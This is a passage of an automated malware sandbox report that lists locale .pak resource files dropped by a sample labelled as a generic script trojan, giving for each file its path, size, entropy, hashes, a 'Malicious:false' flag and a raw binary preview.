                                                                    Preview:.........._.h.$...i.5...j.A...k.P...l.[...n.c...o.h...p.u...r.{...s.....t.....v.....w.....y.....z.....|.....}............................................................. .....".....E.....S.....`.....p.....w.................................................................3.....;.....I.....Y.....a.....n.................................................................;.....P.....W.....^.....p.....}...........................................................0.....>.....C.....K.....R.....W.....a.....l...............................................$.....R.....x.................................................................'.....8.....?.....B.....C.....K.....S.....[.....c.....i.....u.............................@.....Q.....a.................................................................%.....:.....T............................................. .....".....%.....(.+...*.D...+.G...,.e.....u.../.....0.....1.....3.....4.....5.....6.5...7.H...8.\...9.i...;.w...<.....=.....>.....?.....@.....A...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\it.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):397402
                                                                    Entropy (8bit):5.301296912236702
                                                                    Encrypted:false
                                                                    SSDEEP:6144:n9BKi2azctogSrqRrhsO11GT9TeLAG3XRU2gY7OfLwH+WcMgB8HryeuRNBPJX9SO:n9FTnzZY28+2vx+0e55zoI
                                                                    MD5:745F16CA860EE751F70517C299C4AB0E
                                                                    SHA1:54D933AD839C961DD63A47C92A5B935EEF208119
                                                                    SHA-256:10E65F42CE01BA19EBF4B074E8B2456213234482EADF443DFAD6105FAF6CDE4C
                                                                    SHA-512:238343D6C80B82AE900F5ABF4347E542C9EA016D75FB787B93E41E3C9C471AB33F6B4584387E5EE76950424E25486DD74B9901E7F72876960C0916C8B9CEE9A6
                                                                    Malicious:false
                                                                    Preview:..........Q.h.@...i.Q...j.]...k.l...l.w...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................%.....,.....3.....:.....;.....<.....>.....i.....|.......................................................................C.....V.....w.....~.....................................................*...........C.....Y.....o.................................................................0.....D.....f.................................................................*.....2.....@.....v............................................... .....,.....?.....T.....W.....k...................................................................................b.......................:.....O.....d.................................................................K.....k................................................... .....".$...%.H...(.`...*.|...+.....,.........../.....0.....1.....3.(...4.H...5.f...6.....7.....8.....9.....;.....<.....=. ...>.K...?.V...@.g...A.....C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ja.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):484003
                                                                    Entropy (8bit):5.752575429591325
                                                                    Encrypted:false
                                                                    SSDEEP:3072:fznG4qRo+yixrD1r04XURrRpZd2hy/NPNQPkwRI6dIKhUNH7bbeCsy5SWbaabF/G:fzGBRo+911WlRpZd2yNp6k5AYxVk
                                                                    MD5:38CD3EF9B7DFF9EFBBE086FA39541333
                                                                    SHA1:321EF69A298D2F9830C14140B0B3B0B50BD95CB0
                                                                    SHA-256:D8FAB5714DAFECB89B3E5FCE4C4D75D2B72893E685E148E9B60F7C096E5B3337
                                                                    SHA-512:40785871032B222A758F29E0C6EC696FBE0F6F5F3274CC80085961621BEC68D7E0FB47C764649C4DD0C27C6EE02460407775FAE9D3A2A8A59362D25A39266CE0
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....m.....o.1...p.>...v.D...w.Q...y.W...z.f...|.l...}.~.........................................................................................3.....Q.....r.....x.............................(.....I.....K.....O.....w.........................................#.....J.....Z.....u..............................................._...........................................................9.....c.......................#.....3.....<.....D.....K.....T.....i.....y.............................B.....c................................... .....D.....G.....V.....q.....................................................$.....1.....D.................z.......................&.....Y.....h.....................................................7.....O...................................#.....C.....I... .R...".d...%.....(.....*.....+.....,.......J.../.h...0.q...1.....3.....4.....5.....6.g...7.....8.....9.....;.....<.....=.....>.:...?.D...@.Y...A.....C.....D.....E.....F.0...G.Z.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\kn.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):960888
                                                                    Entropy (8bit):4.2704203524429865
                                                                    Encrypted:false
                                                                    SSDEEP:12288:P8nyRnHoS7yB/rt2o6i7u7b5frUb+7G+Vma:ti6X5jUA
                                                                    MD5:CAAB4DEB1C40507848F9610D849834CF
                                                                    SHA1:1BC87FF70817BA1E1FDD1B5CB961213418680CBE
                                                                    SHA-256:7A34483E6272F9B8881F0F5A725B477540166561C75B9E7AB627815D4BE1A8A4
                                                                    SHA-512:DC4B63E5A037479BB831B0771AEC0FE6EB016723BCD920B41AB87EF11505626632877073CE4E5E0755510FE19BA134A7B5899332ECEF854008B15639F915860C
                                                                    Malicious:false
                                                                    Preview:..........7.h.t...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|."...}.4.....<.....A.....I.....Q.....Y.....`.....g.....n.....o.....p.....u...........>.....u.......................F.....g.....y...........<.....>.....J.....r.......................^.......................e.................1.....n.....................................................1.....l.....{.....~.................,.....l...........*.................-.....E.....M.....T.....f.............................I.......................S.................d.............................`.....c.......................E...............................................#.....6.....`.................".....=.................(...............................................@.............................".......................(.....h............... ....."."...%.....(.....*.....+.....,.;.....l.../.....0.....1.U...3.o...4.....5.....6.....7.....8.....9.V...;.....<.....=.....>.....?.....@.G...A.....C.....D.=.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ko.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):407632
                                                                    Entropy (8bit):6.124197697056213
                                                                    Encrypted:false
                                                                    SSDEEP:12288:Md9PhJeKVoCGet8Oh2J7klCqZ5T7BKI8LtCq7hUoqAX:Md91UJc5184AX
                                                                    MD5:D6194FC52E962534B360558061DE2A25
                                                                    SHA1:98ED833F8C4BEAC685E55317C452249579610FF8
                                                                    SHA-256:1A5884BD6665B2F404B7328DE013522EE7C41130E57A53038FC991EC38290D21
                                                                    SHA-512:5207A07426C6CEB78F0504613B6D2B8DADF9F31378E67A61091F16D72287ADBC7768D1B7F2A923369197E732426D15A872C091CF88680686581D48A7F94988AB
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....m.....o.....p.....r.....s.-...t.6...y.K...z.Z...|.`...}.r.....z.........................................................................................7.....D.....^.....k.....s.........................................3.....?.....L.....\.....c.....}.................................................................d.....z.................................................................%.....F.....j.......................................................................`.....v.............................*.....6.....L.....Y.....n.........................................................................................x...........D.....M.............................#.....6.....9.....L.....R.....[.....r...................................^.....n.....w.....}..................... .....".....%.....(.....*.M...+.P...,.........../.....0.....1.....3.....4.5...5.]...6.....7.....8.....9.....;.....<.....=.....>.....?./...@.C...A.q...C.....D.....E.....F.....G...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\lt.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):439793
                                                                    Entropy (8bit):5.6365541871793114
                                                                    Encrypted:false
                                                                    SSDEEP:6144:zXtEPi5jFX4VU4EzsnHIOBoU+1Qi7t5GkzvLdyaj+teJvxY2I96Su:CEmguHLBoUnU5TzvLWeJJG6Su
                                                                    MD5:64B08FFC40A605FE74ECC24C3024EE3B
                                                                    SHA1:516296E8A3114DDBF77601A11FAF4326A47975AB
                                                                    SHA-256:8A5D6E29833374E0F74FD7070C1B20856CB6B42ED30D18A5F17E6C2E4A8D783E
                                                                    SHA-512:05D207413186AC2B87A59681EFE4FDF9DC600D0F3E8327E7B9802A42306D80D0DDD9EE07D103B17CAF0518E42AB25B7CA9DA4713941ABC7BCED65961671164AC
                                                                    Malicious:false
                                                                    Preview:..........S.h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....h.....v...............................................&.....7.....9.....=.....e.....................................................(.....7.....Q.....f.....m.....v.....................................................6.....A.....L.....V.....l............................. .....G.....e.....n.....v.....}...............................................).....4.....K.....]................................................................./.....G.....^.....x...........................................................Y....................... .....A.....w...............................................*.....>.....r...............................................L.....Y... .n...".~...%.....(.....*.....+.....,.......6.../.Q...0.T...1.....3.....4.....5.....6.-...7.P...8.p...9.....;.....<.....=.....>.....?.....@.....A.I...C.j.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\lv.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):437670
                                                                    Entropy (8bit):5.638618522703661
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TjewdtAe6tN4tVFHzmstt4Uoo3W3sb3F5hZanXnEv9AhraszLOAty6ls1V:RR/v4UVWwF5UEabns1V
                                                                    MD5:A8CBD741A764F40B16AFEA275F240E7E
                                                                    SHA1:317D30BBAD8FD0C30DE383998EA5BE4EEC0BB246
                                                                    SHA-256:A1A9D84FD3AF571A57BE8B1A9189D40B836808998E00EC9BD15557B83D0E3086
                                                                    SHA-512:3DA91C0CA20165445A2D283DB7DC749FCF73E049BFFF346B1D79B03391AEFC7F1310D3AC2C42109044CFB50AFCF178DCF3A34B4823626228E591F328DD7AFE95
                                                                    Malicious:false
                                                                    Preview:..........C.h.\...i.m...j.y...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......$.....).....1.....9.....A.....H.....O.....V.....W.....X.....Z...........................................................3.....O.....Q.....U.....}...........................................................7.....Q.....b.....h.....n.....................................................,.....5.....8.....?.....U.....g.....y...........................................................'.....@.....c.....g.........................................9.....[.....l...........................................................1.....H.....O.....R.....S.....].....h.....p.....w.......................].....h.......................8.....C.....U.....\.....k.....n.....y...................................S............................................. .....".....%.'...(.A...*.^...+.a...,.........../.....0.....1.....3.....4.,...5.Q...6.....7.....8.....9.....<.....=.....>.....?.....@.....A.i...C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ml.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):998155
                                                                    Entropy (8bit):4.3110320925732095
                                                                    Encrypted:false
                                                                    SSDEEP:12288:T6ALnHOE47/URV1BQMmWDcZubSAD7qcDs3eThx5D/7dZdO3cb:9Owoys3eT5D/79O3u
                                                                    MD5:1C81104AC2CBF7F7739AF62EB77D20D5
                                                                    SHA1:0F0D564F1860302F171356EA35B3A6306C051C10
                                                                    SHA-256:66005BC01175A4F6560D1E9768DBC72B46A4198F8E435250C8EBC232D2DAC108
                                                                    SHA-512:969294EAE8C95A1126803A35B8D3F1FC3C9D22350AA9CC76B2323B77AD7E84395D6D83B89DEB64565783405D6F7EAE40DEF7BDAF0D08DA67845AE9C7DBB26926
                                                                    Malicious:false
                                                                    Preview:..........:.h.n...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......6.....;.....C.....K.....S.....Z.....a.....h.....i.....j.....o.................Z.......................1.....O.................k.....m.....q.......................E.............................x.................Y.............................+....._...........6.....T.....{.............................5.......................u...........,.........................................#.....K...............................................:...........,.....f.............................".....f.......................O.....................................................i................._.....}.......................`.........................................s...........T...........&...........l.......................H.....s......... .....".....%.....(.....*.T...+.W...,.........../.....0.....1.....3.....4.....5.v...6.....7.R...8.....9.....;.S...<.p...=.....>.....?.....@.....A.U...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\mr.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):816652
                                                                    Entropy (8bit):4.350418506868822
                                                                    Encrypted:false
                                                                    SSDEEP:3072:ZE7bv9/9xAvtACKjxUp0djbOXspvibMFFPMUh3RQR3KB+5lx14/H4bmHwMaZ0t4k:ZE7b1fOACsxZjAEV6yZ00VbJ5JgezP5
                                                                    MD5:2CF9F07DDF7A3A70A48E8B524A5AED43
                                                                    SHA1:974C1A01F651092F78D2D20553C3462267DDF4E9
                                                                    SHA-256:23058C0F71D9E40F927775D980524D866F70322E0EF215AA5748C239707451E7
                                                                    SHA-512:0B21570DEEFA41DEFC3C25C57B3171635BCB5593761D48A8116888CE8BE34C1499FF79C7A3EBBE13B5A565C90027D294C6835E92E6254D582A86750640FE90F2
                                                                    Malicious:false
                                                                    Preview:........|.|.h.....i.....j.....k.....l.*...n.2...o.7...p.D...r.J...s.[...t.d...v.y...w.....y.....z.....|.....}.........................................................................q...................................5.....G.....Y.............................<.....a.......................,.....B.....w.......................^.....}.................................................................D.....M.....P.....l.......................A.......................<.....O.....W.....^.....j.............................2.............................J.......................P.....s...................................-.....N.....r.....................................................2...........b...................................K.....d.........................................@.................,.....m.......................:.....]............... .....".....%.J...(.....*.....+.....,.......!.../.]...0.j...1.....3.....4.4...5.n...6.....7.....8.X...9.....;.....<.....=.....>.%...?.8...@.g...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ms.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):374453
                                                                    Entropy (8bit):5.272284824619555
                                                                    Encrypted:false
                                                                    SSDEEP:6144:DZ/AO2kUDrt2MBrIxFQJulcul5WkS/PSOW5soNY3MMyvek:DZ/ApkUDrt2MOxSIl51kP05RYcMA
                                                                    MD5:AEE105366A1870B9D10F0F897E9295DB
                                                                    SHA1:EEE9D789A8EEAFE593CE77A7C554F92A26A2296F
                                                                    SHA-256:C6471AEE5F34F31477D57F593B09CB1DE87F5FD0F9B5E63D8BAB4986CF10D939
                                                                    SHA-512:240688A0054BFEBE36EA2B056194EE07E87BBBEB7E385131C73A64AA7967984610FCB80638DD883837014F9BC920037069D0655E3E92A5922F76813AEDB185FA
                                                                    Malicious:false
                                                                    Preview:..........8.h.r...i.z...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.).....1.....6.....>.....F.....N.....U.....\.....c.....d.....e.....j...........................................................A.....X.....Z.....^...........................................................+.....9.....M.....Z.....a.....f.....u.......................................................................*.....9.....M.....d.......................................................................$.....6.....d.....x.....................................................).....=.....@.....T.....h.....z...................................................................................e...................................$...../.....A.....L.....V.....^.....e.....|...................................1.....F.....L.....R.....a.....v......... .....".....%.....(.....*.....+.....,.......$.../.:...0.D...1.x...3.....4.....5.....6.....7.....8.&...9.9...;.M...<.X...=.i...>.....?.....@.....A...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\nb.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):367614
                                                                    Entropy (8bit):5.435724855090923
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TAJxNH0uqnIhgFYMqOp7fwcbgtmX07Sgzuu5Dn4XYnOGrr:ExdfqnPFYMqOp7fwcwSgB5Dn4LGrr
                                                                    MD5:55D5AD4EACB12824CFCD89470664C856
                                                                    SHA1:F893C00D8D4FDB2F3E7A74A8BE823E5E8F0CD673
                                                                    SHA-256:4F44789A2C38EDC396A31ABA5CC09D20FB84CD1E06F70C49F0664289C33CD261
                                                                    SHA-512:555D87BE8C97F466C6B3E7B23EC0210335846398C33DBA71E926FF7E26901A3908DBB0F639C93DB2D090C9D8BDA48EDDF196B1A09794D0E396B2C02B4720F37E
                                                                    Malicious:false
                                                                    Preview:..........P.h.B...i.Y...j.e...k.t...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....F.....m.....x.................................................................".....J.....^.....v.....{.....................................................)...../.....5.....D.....T.....c.......................................................................-.....J.....c.....{.......................................................................+.....6.....@.....Y.....o.......................................................................%.....5.....I.....P.....S.....T.....[.....c.....n.....u.......................*...........x...........................................................,.....I.....`.....y...............................................'.....2... .7...".@...%.Z...(.z...*.....+.....,.........../.....0.....1.....3. ...4.:...5.O...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.....A.?...C.\.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\nl.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):379453
                                                                    Entropy (8bit):5.379227569652463
                                                                    Encrypted:false
                                                                    SSDEEP:6144:KcJ9Smne7gqDO5EQHzpamU3D+qn7Cv5qPxOGpLMsLPW:Km9nCgqDO5ELrOv5qPxOGpLM+PW
                                                                    MD5:0F04BAC280035FAB018F634BCB5F53AE
                                                                    SHA1:4CAD76EAECD924B12013E98C3A0E99B192BE8936
                                                                    SHA-256:BE254BCDA4DBE167CB2E57402A4A0A814D591807C675302D2CE286013B40799B
                                                                    SHA-512:1256A6ACAC5A42621CB59EB3DA42DDEEACFE290F6AE4A92D00EBD4450A8B7CCB6F0CD5C21CF0F18FE4D43D0D7AEE87B6991FEF154908792930295A3871FA53DF
                                                                    Malicious:false
                                                                    Preview:..........Y.h.0...i.A...j.M...k.\...l.g...n.o...o.t...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................#.....*.....+.....,...........\.....h.....x.................................................................).....A.....].....k.....{...............................................)...........7.....F.....V.....e.................................................................3.....K.....o.................................................................).....0.....E.....}.........................................'.....1.....?.....^.....a.....v.............................................................................).....k.......................+.....@.....X.................................................................3.....H.....f............................................. .....".....%.....(.+...*.D...+.G...,.e.....v.../.....0.....1.....3.....4.....5.....6.J...7.b...8.....9.....;.....<.....=.....>.....?.....@.....A.....C.8...D.B.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\pl.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):422325
                                                                    Entropy (8bit):5.774687126444438
                                                                    Encrypted:false
                                                                    SSDEEP:12288:roj98jy/jojSoM/Z+Xgv3iWhbhvPeCUdxUwVTmNF1Qhjhd5UR405Y:ryMV+1Qhb5IY
                                                                    MD5:F1D48A7DCD4880A27E39B7561B6EB0AB
                                                                    SHA1:353C3BA213CD2E1F7423C6BA857A8D8BE40D8302
                                                                    SHA-256:2593C8B59849FBC690CBD513F06685EA3292CD0187FCF6B9069CBF3C9B0E8A85
                                                                    SHA-512:132DA2D3C1A4DAD5CCB399B107D7B6D9203A4B264EF8A65ADD11C5E8C75859115443E1C65ECE2E690C046A82687829F54EC855F99D4843F859AB1DD7C71F35A5
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.O...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....j.....y.....................................................!.....#.....'.....O.....g.................................................................*.....0.....6.....I.....].....o.............................................................................J.....f.............................................................................K....._.....j.....................................................<.....?.....N.....\.....k.......................................................................9.......................(.....E.....`.....................................................#.....=.....k...............................................9.....D... .M...".]...%.....(.....*.....+.....,.........../.....0."...1.Q...3.`...4.....5.....6.....7.....8.....9.....;.&...<.1...=.;...>.O...?.X...@.k...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\pt-BR.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):399250
                                                                    Entropy (8bit):5.432001310431886
                                                                    Encrypted:false
                                                                    SSDEEP:6144:oNssFqCoNBXBL3sNA65VyS15LqJVlLUoR1peV:oNssFqIF5uJH4oR/g
                                                                    MD5:8E931FFBDED8933891FB27D2CCA7F37D
                                                                    SHA1:AB0A49B86079D3E0EB9B684CA36EB98D1D1FD473
                                                                    SHA-256:6632BD12F04A5385012B5CDEBE8C0DAD4A06750DC91C974264D8FE60E8B6951D
                                                                    SHA-512:CF0F6485A65C13CF5DDD6457D34CDEA222708B0BB5CA57034ED2C4900FD22765385547AF2E2391E78F02DCF00B7A2B3AC42A3509DD4237581CFB87B8F389E48D
                                                                    Malicious:false
                                                                    Preview:..........=.h.h...i.y...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.(.....0.....5.....=.....E.....M.....T.....[.....b.....c.....d.....i...........................................................@.....U.....W.....[...........................................................'.....A.....a.....x...............................................!.....,.....<.....I.....M.....P.....W.....l.....z.....................................................&.....,.....7.....E.....].....g.....x...................................4.....>.....N.....[.....m...................................................................................%.....,.....<.....o.......................&.....;.....R.....z.................................................................G.....e............................................. .....".....%.)...(.?...*.Z...+.]...,.{........./.....0.....1.....3.....4.....5.'...6._...7.s...8.....9.....;.....<.....=.....>.....?.....@.....A.0...C.S...D.].

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\pt-PT.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):400379
                                                                    Entropy (8bit):5.412017917472705
                                                                    Encrypted:false
                                                                    SSDEEP:6144:dqPhA4zslBWfIw2ieJVJJxhmOcXLFIUK5IKM4RV6X:EJolB/2bfK5IKM4RG
                                                                    MD5:B4954B064E3F6A9BA546DDA5FA625927
                                                                    SHA1:584686C6026518932991F7DE611E2266D8523F9D
                                                                    SHA-256:EE1E014550B85E3D18FB5128984A713D9F6DE2258001B50DDD18391E7307B4A1
                                                                    SHA-512:CB3B465B311F83B972ECA1C66862B2C5D6EA6AC15282E0094AEA455123DDF32E85DF24A94A0AEDBE1B925FF3ED005BA1E00D5EE820676D7A5A366153ADE90EF7
                                                                    Malicious:false
                                                                    Preview:..........2.h.~...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.&...|.,...}.>.....F.....K.....S.....[.....c.....j.....q.....x.....y.....z.....................................................!.....).....J.....\.....^.....b...........................................................).....<.....W.....o.....y.....................................................'.....4.....8.....;.....B.....[.....i.....z...............................................$.....*.....5.....C.....Y.....a.....r.........................................6.....A.....Q.....^.....p.............................................................................%...........5.....F.............................>.....R.....f...........................................................(.....U.....q............................................... ... .$...".8...%.S...(.i...*.....+.....,.........../.....0.....1.....3.&...4.J...5.n...6.....7.....8.....9.....;.....<.....=.....>.A...?.L...@.a...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ro.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):412797
                                                                    Entropy (8bit):5.469387509353947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:Lsg4/xnSFcFG1Y6vFEsif5QB0o1s21/oulzr:Lt7FcFG1Y6vesif5QKob/dr
                                                                    MD5:D2758F6ADBAEEA7CD5D95F4AD6DDE954
                                                                    SHA1:D7476DB23D8B0E11BBABF6A59FDE7609586BDC8A
                                                                    SHA-256:2B7906F33BFBE8E9968BCD65366E2E996CDF2F3E1A1FC56AD54BAF261C66954C
                                                                    SHA-512:8378032D6FEBEA8B5047ADA667CB19E6A41F890CB36305ACC2500662B4377CAEF3DC50987C925E05F21C12E32C3920188A58EE59D687266D70B8BFB1B0169A6E
                                                                    Malicious:false
                                                                    Preview:..........Z.h.....i.?...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....e.....t.......................................................................2.....S.....p.....y...............................................-.....D.....L....._.....s...............................................2.....=.....E.....b...................................>.....O.....W....._.....f.....l.....{...............................................+.....;.....b...........................................................'.....B.....`.....t.....{.....~...............................................].............................2.....b.....m.....................................................?.....g.........................................#...../... .9...".M...%.p...(.....*.....+.....,.........../.....0.....1.....3.?...4.[...5.{...6.....7.....8.....9.....;.....<.....=.(...>.C...?.K...@.Z...A.....C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ru.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):672991
                                                                    Entropy (8bit):4.887128747074479
                                                                    Encrypted:false
                                                                    SSDEEP:12288:xkFzEroY5eXN2hHO3j/jHXzvMBJJWkKce8P/XzFGGJn/aZ/LNUFC0WGWajfG1UpM:xUQMi5y6d4
                                                                    MD5:2885BDE990EE3B30F2C54A4067421B68
                                                                    SHA1:AE16C4D534B120FDD68D33C091A0EC89FD58793F
                                                                    SHA-256:9FCDA0D1FAB7FFF7E2F27980DE8D94FF31E14287F58BD5D35929DE5DD9CBCDCA
                                                                    SHA-512:F7781F5C07FBF128399B88245F35055964FF0CDE1CC6B35563ABC64F520971CE9916827097CA18855B46EC6397639F5416A6E8386A9390AFBA4332D47D21693F
                                                                    Malicious:false
                                                                    Preview:............h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................".....#.....$.....&.....~...................................4.....>.....H.........................................-.....9.....X.....l...................................T.....w.............................E.....o.....y...............................................$.....?.....|.......................).....7.....?.....M.....n...................................H.....X.......................#.....D.....W.....{...................................<.....^...........................................................r.............................@.....g.............................).....>.....L.....z.................`.....~...........$.....U.....g.....{..................... .....".....%.,...(.r...*.....+.....,.........../.:...0.K...1.....3.....4.....5."...6.....7.....8.....9.....;.....<.1...=.E...>.|...?.....@.....A.-...C.e...D.v...E.....F...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\sk.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):426178
                                                                    Entropy (8bit):5.821396103086126
                                                                    Encrypted:false
                                                                    SSDEEP:6144:M43lA0ct/muNypigJ4BOn5aHSL9aQCqoLWGL:91cgsypipBI5aHSL9aQCDLd
                                                                    MD5:B7E97CC98B104053E5F1D6A671C703B7
                                                                    SHA1:0F7293F1744AE2CD858EB3431EE016641478AE7D
                                                                    SHA-256:B0D38869275D9D295E42B0B90D0177E0CA56A393874E4BB454439B8CE25D686F
                                                                    SHA-512:EF3247C6F0F4065A4B68DB6BF7E28C8101A9C6C791B3F771ED67B5B70F2C9689CEC67A1C864F423382C076E4CBB6019C1C0CB9AD0204454E28F749A69B6B0DE0
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.R...j.^...k.m...l.x...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................&.....-.....4.....;.....<.....=.....?.....s.....................................................(.....=.....?.....C.....k.....................................................'.....7.....S.....b.....h.....p...........................................................-.....8.....V.....l.....~...........................................................#.....2.....I.....T.....o...................................8.....B.....P.....\.....k.............................................................................'...../.....;.....K.................?.....F.............................+.....F.....K.....W.....b.....k...................................N............................................. .....".....%.,...(.G...*.h...+.k...,.........../.....0.....1.....3.....4. ...5.?...6.v...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.Z...C.{...D.....E...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\sl.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):411437
                                                                    Entropy (8bit):5.49350335324308
                                                                    Encrypted:false
                                                                    SSDEEP:6144:tnerKYjnS4fhmi0i2iiBnnbANjbnPMum4ocyxPbPD/yu0zrVftjQLc35BdFPcNpU:lEjnSn1iHd35vtcqO+i/fz50qg
                                                                    MD5:CA763E801DE642E4D68510900FF6FABB
                                                                    SHA1:C32A871831CE486514F621B3AB09387548EE1CFF
                                                                    SHA-256:340E0BABE5FDDBFDA601C747127251CF111DD7D79D0D6A5EC4E8443B835027DE
                                                                    SHA-512:E2847CE75DE57DEB05528DD9557047EDCD15D86BF40A911EB97E988A8FDBDA1CD0E0A81320EADF510C91C826499A897C770C007DE936927DF7A1CC82FA262039
                                                                    Malicious:false
